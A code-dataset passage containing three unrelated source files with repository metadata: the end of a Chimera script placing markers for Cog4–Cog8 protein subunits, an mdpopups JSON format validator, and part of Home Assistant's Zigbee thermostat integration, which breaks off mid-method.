if "Cog4_0" not in marker_sets:
s=new_marker_set('Cog4_0')
marker_sets["Cog4_0"]=s
s= marker_sets["Cog4_0"]
mark=s.place_marker((381.477, 607.364, 500.136), (0, 0, 0.8), 17.1475)
if "Cog4_1" not in marker_sets:
s=new_marker_set('Cog4_1')
marker_sets["Cog4_1"]=s
s= marker_sets["Cog4_1"]
mark=s.place_marker((405.039, 598.129, 513.244), (0, 0, 0.8), 17.1475)
if "Cog4_2" not in marker_sets:
s=new_marker_set('Cog4_2')
marker_sets["Cog4_2"]=s
s= marker_sets["Cog4_2"]
mark=s.place_marker((428.199, 586.683, 525.425), (0, 0, 0.8), 17.1475)
if "Cog4_3" not in marker_sets:
s=new_marker_set('Cog4_3')
marker_sets["Cog4_3"]=s
s= marker_sets["Cog4_3"]
mark=s.place_marker((450.137, 571.143, 535.615), (0, 0, 0.8), 17.1475)
if "Cog4_4" not in marker_sets:
s=new_marker_set('Cog4_4')
marker_sets["Cog4_4"]=s
s= marker_sets["Cog4_4"]
mark=s.place_marker((468.197, 549.587, 541.645), (0, 0, 0.8), 17.1475)
if "Cog4_5" not in marker_sets:
s=new_marker_set('Cog4_5')
marker_sets["Cog4_5"]=s
s= marker_sets["Cog4_5"]
mark=s.place_marker((482.793, 524.718, 543.984), (0, 0, 0.8), 17.1475)
if "Cog4_6" not in marker_sets:
s=new_marker_set('Cog4_6')
marker_sets["Cog4_6"]=s
s= marker_sets["Cog4_6"]
mark=s.place_marker((492.835, 497.45, 546.677), (0, 0, 0.8), 17.1475)
if "Cog4_GFPC" not in marker_sets:
s=new_marker_set('Cog4_GFPC')
marker_sets["Cog4_GFPC"]=s
s= marker_sets["Cog4_GFPC"]
mark=s.place_marker((294.216, 641.996, 625.095), (0, 0, 0.8), 18.4716)
if "Cog4_Anch" not in marker_sets:
s=new_marker_set('Cog4_Anch')
marker_sets["Cog4_Anch"]=s
s= marker_sets["Cog4_Anch"]
mark=s.place_marker((686.947, 337.35, 479.808), (0, 0, 0.8), 18.4716)
if "Cog5_GFPN" not in marker_sets:
s=new_marker_set('Cog5_GFPN')
marker_sets["Cog5_GFPN"]=s
s= marker_sets["Cog5_GFPN"]
mark=s.place_marker((507.234, 504.53, 513.028), (0.3, 0.3, 0.3), 18.4716)
if "Cog5_0" not in marker_sets:
s=new_marker_set('Cog5_0')
marker_sets["Cog5_0"]=s
s= marker_sets["Cog5_0"]
mark=s.place_marker((507.234, 504.53, 513.028), (0.3, 0.3, 0.3), 17.1475)
if "Cog5_1" not in marker_sets:
s=new_marker_set('Cog5_1')
marker_sets["Cog5_1"]=s
s= marker_sets["Cog5_1"]
mark=s.place_marker((521.843, 515.862, 534.197), (0.3, 0.3, 0.3), 17.1475)
if "Cog5_2" not in marker_sets:
s=new_marker_set('Cog5_2')
marker_sets["Cog5_2"]=s
s= marker_sets["Cog5_2"]
mark=s.place_marker((548.917, 523.011, 539.825), (0.3, 0.3, 0.3), 17.1475)
if "Cog5_3" not in marker_sets:
s=new_marker_set('Cog5_3')
marker_sets["Cog5_3"]=s
s= marker_sets["Cog5_3"]
mark=s.place_marker((554.226, 546.614, 556.007), (0.3, 0.3, 0.3), 17.1475)
if "Cog5_GFPC" not in marker_sets:
s=new_marker_set('Cog5_GFPC')
marker_sets["Cog5_GFPC"]=s
s= marker_sets["Cog5_GFPC"]
mark=s.place_marker((575.468, 458.014, 640.709), (0.3, 0.3, 0.3), 18.4716)
if "Cog5_Anch" not in marker_sets:
s=new_marker_set('Cog5_Anch')
marker_sets["Cog5_Anch"]=s
s= marker_sets["Cog5_Anch"]
mark=s.place_marker((531.826, 640.077, 475.472), (0.3, 0.3, 0.3), 18.4716)
if "Cog6_GFPN" not in marker_sets:
s=new_marker_set('Cog6_GFPN')
marker_sets["Cog6_GFPN"]=s
s= marker_sets["Cog6_GFPN"]
mark=s.place_marker((550.624, 476.489, 597.036), (0.21, 0.49, 0.72), 18.4716)
if "Cog6_0" not in marker_sets:
s=new_marker_set('Cog6_0')
marker_sets["Cog6_0"]=s
s= marker_sets["Cog6_0"]
mark=s.place_marker((550.813, 476.507, 597.159), (0.21, 0.49, 0.72), 17.1475)
if "Cog6_1" not in marker_sets:
s=new_marker_set('Cog6_1')
marker_sets["Cog6_1"]=s
s= marker_sets["Cog6_1"]
mark=s.place_marker((558.797, 456.987, 578.122), (0.21, 0.49, 0.72), 17.1475)
if "Cog6_2" not in marker_sets:
s=new_marker_set('Cog6_2')
marker_sets["Cog6_2"]=s
s= marker_sets["Cog6_2"]
mark=s.place_marker((536.994, 446.214, 563.08), (0.21, 0.49, 0.72), 17.1475)
if "Cog6_3" not in marker_sets:
s=new_marker_set('Cog6_3')
marker_sets["Cog6_3"]=s
s= marker_sets["Cog6_3"]
mark=s.place_marker((508.395, 447.652, 561.121), (0.21, 0.49, 0.72), 17.1475)
if "Cog6_4" not in marker_sets:
s=new_marker_set('Cog6_4')
marker_sets["Cog6_4"]=s
s= marker_sets["Cog6_4"]
mark=s.place_marker((480.361, 449.521, 566.859), (0.21, 0.49, 0.72), 17.1475)
if "Cog6_5" not in marker_sets:
s=new_marker_set('Cog6_5')
marker_sets["Cog6_5"]=s
s= marker_sets["Cog6_5"]
mark=s.place_marker((456.185, 450.2, 582.433), (0.21, 0.49, 0.72), 17.1475)
if "Cog6_6" not in marker_sets:
s=new_marker_set('Cog6_6')
marker_sets["Cog6_6"]=s
s= marker_sets["Cog6_6"]
mark=s.place_marker((438.957, 447.29, 605.431), (0.21, 0.49, 0.72), 17.1475)
if "Cog6_GFPC" not in marker_sets:
s=new_marker_set('Cog6_GFPC')
marker_sets["Cog6_GFPC"]=s
s= marker_sets["Cog6_GFPC"]
mark=s.place_marker((484.207, 431.772, 535.719), (0.21, 0.49, 0.72), 18.4716)
if "Cog6_Anch" not in marker_sets:
s=new_marker_set('Cog6_Anch')
marker_sets["Cog6_Anch"]=s
s= marker_sets["Cog6_Anch"]
mark=s.place_marker((394.025, 463.66, 680.011), (0.21, 0.49, 0.72), 18.4716)
if "Cog7_GFPN" not in marker_sets:
s=new_marker_set('Cog7_GFPN')
marker_sets["Cog7_GFPN"]=s
s= marker_sets["Cog7_GFPN"]
mark=s.place_marker((525.627, 443.578, 519.064), (0.7, 0.7, 0.7), 18.4716)
if "Cog7_0" not in marker_sets:
s=new_marker_set('Cog7_0')
marker_sets["Cog7_0"]=s
s= marker_sets["Cog7_0"]
mark=s.place_marker((534.371, 463.471, 533.759), (0.7, 0.7, 0.7), 17.1475)
if "Cog7_1" not in marker_sets:
s=new_marker_set('Cog7_1')
marker_sets["Cog7_1"]=s
s= marker_sets["Cog7_1"]
mark=s.place_marker((554.566, 506.6, 566.828), (0.7, 0.7, 0.7), 17.1475)
if "Cog7_2" not in marker_sets:
s=new_marker_set('Cog7_2')
marker_sets["Cog7_2"]=s
s= marker_sets["Cog7_2"]
mark=s.place_marker((573.12, 552.993, 594.966), (0.7, 0.7, 0.7), 17.1475)
if "Cog7_GFPC" not in marker_sets:
s=new_marker_set('Cog7_GFPC')
marker_sets["Cog7_GFPC"]=s
s= marker_sets["Cog7_GFPC"]
mark=s.place_marker((623.089, 498.477, 625.518), (0.7, 0.7, 0.7), 18.4716)
if "Cog7_Anch" not in marker_sets:
s=new_marker_set('Cog7_Anch')
marker_sets["Cog7_Anch"]=s
s= marker_sets["Cog7_Anch"]
mark=s.place_marker((562.76, 656.528, 609.552), (0.7, 0.7, 0.7), 18.4716)
if "Cog8_0" not in marker_sets:
s=new_marker_set('Cog8_0')
marker_sets["Cog8_0"]=s
s= marker_sets["Cog8_0"]
mark=s.place_marker((551.659, 430.878, 536.446), (1, 0.5, 0), 17.1475)
if "Cog8_1" not in marker_sets:
s=new_marker_set('Cog8_1')
marker_sets["Cog8_1"]=s
s= marker_sets["Cog8_1"]
mark=s.place_marker((563.589, 450.866, 520.852), (1, 0.5, 0), 17.1475)
if "Cog8_2" not in marker_sets:
s=new_marker_set('Cog8_2')
marker_sets["Cog8_2"]=s
s= marker_sets["Cog8_2"]
mark=s.place_marker((585.763, 468.066, 518.671), (1, 0.5, 0), 17.1475)
if "Cog8_3" not in marker_sets:
s=new_marker_set('Cog8_3')
marker_sets["Cog8_3"]=s
s= marker_sets["Cog8_3"]
mark=s.place_marker((600.138, 482.561, 499.402), (1, 0.5, 0), 17.1475)
if "Cog8_4" not in marker_sets:
s=new_marker_set('Cog8_4')
marker_sets["Cog8_4"]=s
s= marker_sets["Cog8_4"]
mark=s.place_marker((588.319, 507.991, 497.819), (1, 0.5, 0), 17.1475)
if "Cog8_5" not in marker_sets:
s=new_marker_set('Cog8_5')
marker_sets["Cog8_5"]=s
s= marker_sets["Cog8_5"]
mark=s.place_marker((576.134, 532.851, 502.381), (1, 0.5, 0), 17.1475)
if "Cog8_GFPC" not in marker_sets:
s=new_marker_set('Cog8_GFPC')
marker_sets["Cog8_GFPC"]=s
s= marker_sets["Cog8_GFPC"]
mark=s.place_marker((551.519, 472.589, 551.155), (1, 0.6, 0.1), 18.4716)
if "Cog8_Anch" not in marker_sets:
s=new_marker_set('Cog8_Anch')
marker_sets["Cog8_Anch"]=s
s= marker_sets["Cog8_Anch"]
mark=s.place_marker((600.964, 592.874, 453.45), (1, 0.6, 0.1), 18.4716)
for k in surf_sets.keys():
chimera.openModels.add([surf_sets[k]])
| [
"[email protected]"
] | |
f806b32b55a9145c4c04c121ccedc5edfff7e060 | 632d7759536ed0726499c2d52c8eb13b5ab213ab | /Data/Packages/mdpopups/tests/validate_json_format.py | 0afbb2d170664281507ba611c0927e38799d1ae9 | [
"MIT"
] | permissive | Void2403/sublime_text_3_costomize | e660ad803eb12b20e9fa7f8eb7c6aad0f2b4d9bc | c19977e498bd948fd6d8f55bd48c8d82cbc317c3 | refs/heads/master | 2023-08-31T21:32:32.791574 | 2019-05-31T11:46:19 | 2019-05-31T11:46:19 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,661 | py | """
Validate JSON format.
Licensed under MIT
Copyright (c) 2012-2015 Isaac Muse <[email protected]>
"""
import re
import codecs
import json
RE_LINE_PRESERVE = re.compile(r"\r?\n", re.MULTILINE)
RE_COMMENT = re.compile(
r'''(?x)
(?P<comments>
/\*[^*]*\*+(?:[^/*][^*]*\*+)*/ # multi-line comments
| [ \t]*//(?:[^\r\n])* # single line comments
)
| (?P<code>
"(?:\\.|[^"\\])*" # double quotes
| .[^/"']* # everything else
)
''',
re.DOTALL
)
RE_TRAILING_COMMA = re.compile(
r'''(?x)
(
(?P<square_comma>
, # trailing comma
(?P<square_ws>[\s\r\n]*) # white space
(?P<square_bracket>\]) # bracket
)
| (?P<curly_comma>
, # trailing comma
(?P<curly_ws>[\s\r\n]*) # white space
(?P<curly_bracket>\}) # bracket
)
)
| (?P<code>
"(?:\\.|[^"\\])*" # double quoted string
| .[^,"']* # everything else
)
''',
re.DOTALL
)
RE_LINE_INDENT_TAB = re.compile(r'^(?:(\t+)?(?:(/\*)|[^ \t\r\n])[^\r\n]*)?\r?\n$')
RE_LINE_INDENT_SPACE = re.compile(r'^(?:((?: {4})+)?(?:(/\*)|[^ \t\r\n])[^\r\n]*)?\r?\n$')
RE_TRAILING_SPACES = re.compile(r'^.*?[ \t]+\r?\n?$')
RE_COMMENT_END = re.compile(r'\*/')
PATTERN_COMMENT_INDENT_SPACE = r'^(%s *?[^\t\r\n][^\r\n]*)?\r?\n$'
PATTERN_COMMENT_INDENT_TAB = r'^(%s[ \t]*[^ \t\r\n][^\r\n]*)?\r?\n$'
E_MALFORMED = "E0"
E_COMMENTS = "E1"
E_COMMA = "E2"
W_NL_START = "W1"
W_NL_END = "W2"
W_INDENT = "W3"
W_TRAILING_SPACE = "W4"
W_COMMENT_INDENT = "W5"
VIOLATION_MSG = {
E_MALFORMED: 'JSON content is malformed.',
E_COMMENTS: 'Comments are not part of the JSON spec.',
E_COMMA: 'Dangling comma found.',
W_NL_START: 'Unnecessary newlines at the start of file.',
W_NL_END: 'Missing a new line at the end of the file.',
W_INDENT: 'Indentation Error.',
W_TRAILING_SPACE: 'Trailing whitespace.',
W_COMMENT_INDENT: 'Comment Indentation Error.'
}
class CheckJsonFormat(object):
"""
Test JSON for format irregularities.
- Trailing spaces.
- Inconsistent indentation.
- New lines at end of file.
- Unnecessary newlines at start of file.
- Trailing commas.
- Malformed JSON.
"""
def __init__(self, use_tabs=False, allow_comments=False):
"""Setup the settings."""
self.use_tabs = use_tabs
self.allow_comments = allow_comments
self.fail = False
def index_lines(self, text):
"""Index the char range of each line."""
self.line_range = []
count = 1
last = 0
for m in re.finditer('\n', text):
self.line_range.append((last, m.end(0) - 1, count))
last = m.end(0)
count += 1
def get_line(self, pt):
"""Get the line from char index."""
line = None
for r in self.line_range:
if pt >= r[0] and pt <= r[1]:
line = r[2]
break
return line
def check_comments(self, text):
"""
Check for JavaScript comments.
Log them and strip them out so we can continue.
"""
def remove_comments(group):
return ''.join([x[0] for x in RE_LINE_PRESERVE.findall(group)])
def evaluate(m):
text = ''
g = m.groupdict()
if g["code"] is None:
if not self.allow_comments:
self.log_failure(E_COMMENTS, self.get_line(m.start(0)))
text = remove_comments(g["comments"])
else:
text = g["code"]
return text
content = ''.join(map(lambda m: evaluate(m), RE_COMMENT.finditer(text)))
return content
def check_dangling_commas(self, text):
"""
Check for dangling commas.
Log them and strip them out so we can continue.
"""
def check_comma(g, m, line):
# ,] -> ] or ,} -> }
self.log_failure(E_COMMA, line)
if g["square_comma"] is not None:
return g["square_ws"] + g["square_bracket"]
else:
return g["curly_ws"] + g["curly_bracket"]
def evaluate(m):
g = m.groupdict()
return check_comma(g, m, self.get_line(m.start(0))) if g["code"] is None else g["code"]
return ''.join(map(lambda m: evaluate(m), RE_TRAILING_COMMA.finditer(text)))
def log_failure(self, code, line=None):
"""
Log failure.
Log failure code, line number (if available) and message.
"""
if line:
print("%s: Line %d - %s" % (code, line, VIOLATION_MSG[code]))
else:
print("%s: %s" % (code, VIOLATION_MSG[code]))
self.fail = True
def check_format(self, file_name):
"""Initiate the check."""
self.fail = False
comment_align = None
with codecs.open(file_name, encoding='utf-8') as f:
count = 1
for line in f:
indent_match = (RE_LINE_INDENT_TAB if self.use_tabs else RE_LINE_INDENT_SPACE).match(line)
end_comment = (
(comment_align is not None or (indent_match and indent_match.group(2))) and
RE_COMMENT_END.search(line)
)
# Don't allow empty lines at file start.
if count == 1 and line.strip() == '':
self.log_failure(W_NL_START, count)
# Line must end in new line
if not line.endswith('\n'):
self.log_failure(W_NL_END, count)
# Trailing spaces
if RE_TRAILING_SPACES.match(line):
self.log_failure(W_TRAILING_SPACE, count)
# Handle block comment content indentation
if comment_align is not None:
if comment_align.match(line) is None:
self.log_failure(W_COMMENT_INDENT, count)
if end_comment:
comment_align = None
# Handle general indentation
elif indent_match is None:
self.log_failure(W_INDENT, count)
# Enter into block comment
elif comment_align is None and indent_match.group(2):
alignment = indent_match.group(1) if indent_match.group(1) is not None else ""
if not end_comment:
comment_align = re.compile(
(PATTERN_COMMENT_INDENT_TAB if self.use_tabs else PATTERN_COMMENT_INDENT_SPACE) % alignment
)
count += 1
f.seek(0)
text = f.read()
self.index_lines(text)
text = self.check_comments(text)
self.index_lines(text)
text = self.check_dangling_commas(text)
try:
json.loads(text)
except Exception as e:
self.log_failure(E_MALFORMED)
print(e)
return self.fail
if __name__ == "__main__":
import sys
cjf = CheckJsonFormat(False, True)
cjf.check_format(sys.argv[1])
| [
"[email protected]"
] | |
dede3dc0563b1336d20fdf7f164822132c1bf9be | 2ed86a79d0fcd299ad4a01310954c5eddcf01edf | /homeassistant/components/zha/climate.py | 9f999bd52fa561f770e24b9319954d8356a8b231 | [
"Apache-2.0"
] | permissive | konnected-io/home-assistant | 037f12c87bb79e19220192eb918e49db1b1a8b3e | 2e65b77b2b5c17919939481f327963abdfdc53f0 | refs/heads/dev | 2023-05-11T08:57:41.891518 | 2023-05-07T20:03:37 | 2023-05-07T20:03:37 | 109,931,626 | 24 | 10 | Apache-2.0 | 2023-02-22T06:24:01 | 2017-11-08T05:27:21 | Python | UTF-8 | Python | false | false | 29,742 | py | """Climate on Zigbee Home Automation networks.
For more details on this platform, please refer to the documentation
at https://home-assistant.io/components/zha.climate/
"""
from __future__ import annotations
from datetime import datetime, timedelta
import functools
from random import randint
from typing import Any
from zigpy.zcl.clusters.hvac import Fan as F, Thermostat as T
from homeassistant.components.climate import (
ATTR_HVAC_MODE,
ATTR_TARGET_TEMP_HIGH,
ATTR_TARGET_TEMP_LOW,
FAN_AUTO,
FAN_ON,
PRESET_AWAY,
PRESET_BOOST,
PRESET_COMFORT,
PRESET_ECO,
PRESET_NONE,
ClimateEntity,
ClimateEntityFeature,
HVACAction,
HVACMode,
)
from homeassistant.config_entries import ConfigEntry
from homeassistant.const import (
ATTR_TEMPERATURE,
PRECISION_TENTHS,
Platform,
UnitOfTemperature,
)
from homeassistant.core import HomeAssistant, callback
from homeassistant.helpers.dispatcher import async_dispatcher_connect
from homeassistant.helpers.entity_platform import AddEntitiesCallback
from homeassistant.helpers.event import async_track_time_interval
import homeassistant.util.dt as dt_util
from .core import discovery
from .core.const import (
CLUSTER_HANDLER_FAN,
CLUSTER_HANDLER_THERMOSTAT,
DATA_ZHA,
PRESET_COMPLEX,
PRESET_SCHEDULE,
PRESET_TEMP_MANUAL,
SIGNAL_ADD_ENTITIES,
SIGNAL_ATTR_UPDATED,
)
from .core.registries import ZHA_ENTITIES
from .entity import ZhaEntity
ATTR_SYS_MODE = "system_mode"
ATTR_RUNNING_MODE = "running_mode"
ATTR_SETPT_CHANGE_SRC = "setpoint_change_source"
ATTR_SETPT_CHANGE_AMT = "setpoint_change_amount"
ATTR_OCCUPANCY = "occupancy"
ATTR_PI_COOLING_DEMAND = "pi_cooling_demand"
ATTR_PI_HEATING_DEMAND = "pi_heating_demand"
ATTR_OCCP_COOL_SETPT = "occupied_cooling_setpoint"
ATTR_OCCP_HEAT_SETPT = "occupied_heating_setpoint"
ATTR_UNOCCP_HEAT_SETPT = "unoccupied_heating_setpoint"
ATTR_UNOCCP_COOL_SETPT = "unoccupied_cooling_setpoint"
STRICT_MATCH = functools.partial(ZHA_ENTITIES.strict_match, Platform.CLIMATE)
MULTI_MATCH = functools.partial(ZHA_ENTITIES.multipass_match, Platform.CLIMATE)
RUNNING_MODE = {0x00: HVACMode.OFF, 0x03: HVACMode.COOL, 0x04: HVACMode.HEAT}
SEQ_OF_OPERATION = {
0x00: [HVACMode.OFF, HVACMode.COOL], # cooling only
0x01: [HVACMode.OFF, HVACMode.COOL], # cooling with reheat
0x02: [HVACMode.OFF, HVACMode.HEAT], # heating only
0x03: [HVACMode.OFF, HVACMode.HEAT], # heating with reheat
# cooling and heating 4-pipes
0x04: [HVACMode.OFF, HVACMode.HEAT_COOL, HVACMode.COOL, HVACMode.HEAT],
# cooling and heating 4-pipes
0x05: [HVACMode.OFF, HVACMode.HEAT_COOL, HVACMode.COOL, HVACMode.HEAT],
0x06: [HVACMode.COOL, HVACMode.HEAT, HVACMode.OFF], # centralite specific
0x07: [HVACMode.HEAT_COOL, HVACMode.OFF], # centralite specific
}
HVAC_MODE_2_SYSTEM = {
HVACMode.OFF: T.SystemMode.Off,
HVACMode.HEAT_COOL: T.SystemMode.Auto,
HVACMode.COOL: T.SystemMode.Cool,
HVACMode.HEAT: T.SystemMode.Heat,
HVACMode.FAN_ONLY: T.SystemMode.Fan_only,
HVACMode.DRY: T.SystemMode.Dry,
}
SYSTEM_MODE_2_HVAC = {
T.SystemMode.Off: HVACMode.OFF,
T.SystemMode.Auto: HVACMode.HEAT_COOL,
T.SystemMode.Cool: HVACMode.COOL,
T.SystemMode.Heat: HVACMode.HEAT,
T.SystemMode.Emergency_Heating: HVACMode.HEAT,
T.SystemMode.Pre_cooling: HVACMode.COOL, # this is 'precooling'. is it the same?
T.SystemMode.Fan_only: HVACMode.FAN_ONLY,
T.SystemMode.Dry: HVACMode.DRY,
T.SystemMode.Sleep: HVACMode.OFF,
}
ZCL_TEMP = 100
async def async_setup_entry(
hass: HomeAssistant,
config_entry: ConfigEntry,
async_add_entities: AddEntitiesCallback,
) -> None:
"""Set up the Zigbee Home Automation sensor from config entry."""
entities_to_create = hass.data[DATA_ZHA][Platform.CLIMATE]
unsub = async_dispatcher_connect(
hass,
SIGNAL_ADD_ENTITIES,
functools.partial(
discovery.async_add_entities, async_add_entities, entities_to_create
),
)
config_entry.async_on_unload(unsub)
@MULTI_MATCH(
cluster_handler_names=CLUSTER_HANDLER_THERMOSTAT,
aux_cluster_handlers=CLUSTER_HANDLER_FAN,
stop_on_match_group=CLUSTER_HANDLER_THERMOSTAT,
)
class Thermostat(ZhaEntity, ClimateEntity):
"""Representation of a ZHA Thermostat device."""
DEFAULT_MAX_TEMP = 35
DEFAULT_MIN_TEMP = 7
_attr_precision = PRECISION_TENTHS
_attr_temperature_unit = UnitOfTemperature.CELSIUS
_attr_name: str = "Thermostat"
def __init__(self, unique_id, zha_device, cluster_handlers, **kwargs):
"""Initialize ZHA Thermostat instance."""
super().__init__(unique_id, zha_device, cluster_handlers, **kwargs)
self._thrm = self.cluster_handlers.get(CLUSTER_HANDLER_THERMOSTAT)
self._preset = PRESET_NONE
self._presets = []
self._supported_flags = ClimateEntityFeature.TARGET_TEMPERATURE
self._fan = self.cluster_handlers.get(CLUSTER_HANDLER_FAN)
@property
def current_temperature(self):
"""Return the current temperature."""
if self._thrm.local_temperature is None:
return None
return self._thrm.local_temperature / ZCL_TEMP
@property
def extra_state_attributes(self):
"""Return device specific state attributes."""
data = {}
if self.hvac_mode:
mode = SYSTEM_MODE_2_HVAC.get(self._thrm.system_mode, "unknown")
data[ATTR_SYS_MODE] = f"[{self._thrm.system_mode}]/{mode}"
if self._thrm.occupancy is not None:
data[ATTR_OCCUPANCY] = self._thrm.occupancy
if self._thrm.occupied_cooling_setpoint is not None:
data[ATTR_OCCP_COOL_SETPT] = self._thrm.occupied_cooling_setpoint
if self._thrm.occupied_heating_setpoint is not None:
data[ATTR_OCCP_HEAT_SETPT] = self._thrm.occupied_heating_setpoint
if self._thrm.pi_heating_demand is not None:
data[ATTR_PI_HEATING_DEMAND] = self._thrm.pi_heating_demand
if self._thrm.pi_cooling_demand is not None:
data[ATTR_PI_COOLING_DEMAND] = self._thrm.pi_cooling_demand
unoccupied_cooling_setpoint = self._thrm.unoccupied_cooling_setpoint
if unoccupied_cooling_setpoint is not None:
data[ATTR_UNOCCP_COOL_SETPT] = unoccupied_cooling_setpoint
unoccupied_heating_setpoint = self._thrm.unoccupied_heating_setpoint
if unoccupied_heating_setpoint is not None:
data[ATTR_UNOCCP_HEAT_SETPT] = unoccupied_heating_setpoint
return data
@property
def fan_mode(self) -> str | None:
"""Return current FAN mode."""
if self._thrm.running_state is None:
return FAN_AUTO
if self._thrm.running_state & (
T.RunningState.Fan_State_On
| T.RunningState.Fan_2nd_Stage_On
| T.RunningState.Fan_3rd_Stage_On
):
return FAN_ON
return FAN_AUTO
@property
def fan_modes(self) -> list[str] | None:
"""Return supported FAN modes."""
if not self._fan:
return None
return [FAN_AUTO, FAN_ON]
@property
def hvac_action(self) -> HVACAction | None:
"""Return the current HVAC action."""
if (
self._thrm.pi_heating_demand is None
and self._thrm.pi_cooling_demand is None
):
return self._rm_rs_action
return self._pi_demand_action
@property
def _rm_rs_action(self) -> HVACAction | None:
"""Return the current HVAC action based on running mode and running state."""
if (running_state := self._thrm.running_state) is None:
return None
if running_state & (
T.RunningState.Heat_State_On | T.RunningState.Heat_2nd_Stage_On
):
return HVACAction.HEATING
if running_state & (
T.RunningState.Cool_State_On | T.RunningState.Cool_2nd_Stage_On
):
return HVACAction.COOLING
if running_state & (
T.RunningState.Fan_State_On
| T.RunningState.Fan_2nd_Stage_On
| T.RunningState.Fan_3rd_Stage_On
):
return HVACAction.FAN
if running_state & T.RunningState.Idle:
return HVACAction.IDLE
if self.hvac_mode != HVACMode.OFF:
return HVACAction.IDLE
return HVACAction.OFF
@property
def _pi_demand_action(self) -> HVACAction | None:
"""Return the current HVAC action based on pi_demands."""
heating_demand = self._thrm.pi_heating_demand
if heating_demand is not None and heating_demand > 0:
return HVACAction.HEATING
cooling_demand = self._thrm.pi_cooling_demand
if cooling_demand is not None and cooling_demand > 0:
return HVACAction.COOLING
if self.hvac_mode != HVACMode.OFF:
return HVACAction.IDLE
return HVACAction.OFF
@property
def hvac_mode(self) -> HVACMode | None:
"""Return HVAC operation mode."""
return SYSTEM_MODE_2_HVAC.get(self._thrm.system_mode)
@property
def hvac_modes(self) -> list[HVACMode]:
"""Return the list of available HVAC operation modes."""
return SEQ_OF_OPERATION.get(self._thrm.ctrl_sequence_of_oper, [HVACMode.OFF])
@property
def preset_mode(self) -> str:
"""Return current preset mode."""
return self._preset
@property
def preset_modes(self) -> list[str] | None:
"""Return supported preset modes."""
return self._presets
@property
def supported_features(self) -> ClimateEntityFeature:
"""Return the list of supported features."""
features = self._supported_flags
if HVACMode.HEAT_COOL in self.hvac_modes:
features |= ClimateEntityFeature.TARGET_TEMPERATURE_RANGE
if self._fan is not None:
self._supported_flags |= ClimateEntityFeature.FAN_MODE
return features
@property
def target_temperature(self):
"""Return the temperature we try to reach."""
temp = None
if self.hvac_mode == HVACMode.COOL:
if self.preset_mode == PRESET_AWAY:
temp = self._thrm.unoccupied_cooling_setpoint
else:
temp = self._thrm.occupied_cooling_setpoint
elif self.hvac_mode == HVACMode.HEAT:
if self.preset_mode == PRESET_AWAY:
temp = self._thrm.unoccupied_heating_setpoint
else:
temp = self._thrm.occupied_heating_setpoint
if temp is None:
return temp
return round(temp / ZCL_TEMP, 1)
@property
def target_temperature_high(self):
"""Return the upper bound temperature we try to reach."""
if self.hvac_mode != HVACMode.HEAT_COOL:
return None
if self.preset_mode == PRESET_AWAY:
temp = self._thrm.unoccupied_cooling_setpoint
else:
temp = self._thrm.occupied_cooling_setpoint
if temp is None:
return temp
return round(temp / ZCL_TEMP, 1)
@property
def target_temperature_low(self):
"""Return the lower bound temperature we try to reach."""
if self.hvac_mode != HVACMode.HEAT_COOL:
return None
if self.preset_mode == PRESET_AWAY:
temp = self._thrm.unoccupied_heating_setpoint
else:
temp = self._thrm.occupied_heating_setpoint
if temp is None:
return temp
return round(temp / ZCL_TEMP, 1)
@property
def max_temp(self) -> float:
"""Return the maximum temperature."""
temps = []
if HVACMode.HEAT in self.hvac_modes:
temps.append(self._thrm.max_heat_setpoint_limit)
if HVACMode.COOL in self.hvac_modes:
temps.append(self._thrm.max_cool_setpoint_limit)
if not temps:
return self.DEFAULT_MAX_TEMP
return round(max(temps) / ZCL_TEMP, 1)
@property
def min_temp(self) -> float:
"""Return the minimum temperature."""
temps = []
if HVACMode.HEAT in self.hvac_modes:
temps.append(self._thrm.min_heat_setpoint_limit)
if HVACMode.COOL in self.hvac_modes:
temps.append(self._thrm.min_cool_setpoint_limit)
if not temps:
return self.DEFAULT_MIN_TEMP
return round(min(temps) / ZCL_TEMP, 1)
async def async_added_to_hass(self) -> None:
"""Run when about to be added to hass."""
await super().async_added_to_hass()
self.async_accept_signal(
self._thrm, SIGNAL_ATTR_UPDATED, self.async_attribute_updated
)
async def async_attribute_updated(self, record):
"""Handle attribute update from device."""
if (
record.attr_name in (ATTR_OCCP_COOL_SETPT, ATTR_OCCP_HEAT_SETPT)
and self.preset_mode == PRESET_AWAY
):
# occupancy attribute is an unreportable attribute, but if we get
# an attribute update for an "occupied" setpoint, there's a chance
# occupancy has changed
if await self._thrm.get_occupancy() is True:
self._preset = PRESET_NONE
self.debug("Attribute '%s' = %s update", record.attr_name, record.value)
self.async_write_ha_state()
async def async_set_fan_mode(self, fan_mode: str) -> None:
"""Set fan mode."""
if not self.fan_modes or fan_mode not in self.fan_modes:
self.warning("Unsupported '%s' fan mode", fan_mode)
return
if fan_mode == FAN_ON:
mode = F.FanMode.On
else:
mode = F.FanMode.Auto
await self._fan.async_set_speed(mode)
async def async_set_hvac_mode(self, hvac_mode: HVACMode) -> None:
"""Set new target operation mode."""
if hvac_mode not in self.hvac_modes:
self.warning(
"can't set '%s' mode. Supported modes are: %s",
hvac_mode,
self.hvac_modes,
)
return
if await self._thrm.async_set_operation_mode(HVAC_MODE_2_SYSTEM[hvac_mode]):
self.async_write_ha_state()
async def async_set_preset_mode(self, preset_mode: str) -> None:
"""Set new preset mode."""
if not self.preset_modes or preset_mode not in self.preset_modes:
self.debug("Preset mode '%s' is not supported", preset_mode)
return
if self.preset_mode not in (
preset_mode,
PRESET_NONE,
) and not await self.async_preset_handler(self.preset_mode, enable=False):
self.debug("Couldn't turn off '%s' preset", self.preset_mode)
return
if preset_mode != PRESET_NONE and not await self.async_preset_handler(
preset_mode, enable=True
):
self.debug("Couldn't turn on '%s' preset", preset_mode)
return
self._preset = preset_mode
self.async_write_ha_state()
async def async_set_temperature(self, **kwargs: Any) -> None:
"""Set new target temperature."""
low_temp = kwargs.get(ATTR_TARGET_TEMP_LOW)
high_temp = kwargs.get(ATTR_TARGET_TEMP_HIGH)
temp = kwargs.get(ATTR_TEMPERATURE)
hvac_mode = kwargs.get(ATTR_HVAC_MODE)
if hvac_mode is not None:
await self.async_set_hvac_mode(hvac_mode)
thrm = self._thrm
if self.hvac_mode == HVACMode.HEAT_COOL:
success = True
if low_temp is not None:
low_temp = int(low_temp * ZCL_TEMP)
success = success and await thrm.async_set_heating_setpoint(
low_temp, self.preset_mode == PRESET_AWAY
)
self.debug("Setting heating %s setpoint: %s", low_temp, success)
if high_temp is not None:
high_temp = int(high_temp * ZCL_TEMP)
success = success and await thrm.async_set_cooling_setpoint(
high_temp, self.preset_mode == PRESET_AWAY
)
self.debug("Setting cooling %s setpoint: %s", low_temp, success)
